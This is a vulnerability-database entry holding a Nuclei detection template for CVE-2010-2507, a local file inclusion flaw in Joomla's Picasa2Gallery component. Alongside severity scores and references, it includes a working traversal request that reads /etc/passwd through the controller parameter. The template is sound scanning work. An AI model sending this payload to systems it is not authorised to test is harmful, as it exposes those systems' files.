Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-2507
HistorySep 27, 2021 - 11:02 a.m.

Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion

2021-09-2711:02:48
ProjectDiscovery
github.com
6
joomla
picasa2gallery
local file inclusion
directory traversal
unauthorized access
cve-2010-2507

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

AI Score

7

Confidence

High

EPSS

0.017

Percentile

87.7%

A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-2507

info:
  name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/13981
    - https://nvd.nist.gov/vuln/detail/CVE-2010-2507
    - http://packetstormsecurity.org/1006-exploits/joomlapicasa2gallery-lfi.txt
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/59669
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2010-2507
    cwe-id: CWE-22
    epss-score: 0.01671
    epss-percentile: 0.87631
    cpe: cpe:2.3:a:masselink:com_picasa2gallery:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: masselink
    product: com_picasa2gallery
  tags: cve2010,cve,edb,packetstorm,joomla,lfi,masselink

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d0fbfb8ffd049aeaf94cf869ef1eb3f0f13b0d27229bb4ed42baa7347337b5e702205a316eeb82abfedeb1294c785875852bd9e3bda4b7d2e32bfaa24f9613e36cb8:922c64590222798bb761d5b6d8e72950

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

AI Score

7

Confidence

High

EPSS

0.017

Percentile

87.7%

Related for NUCLEI:CVE-2010-2507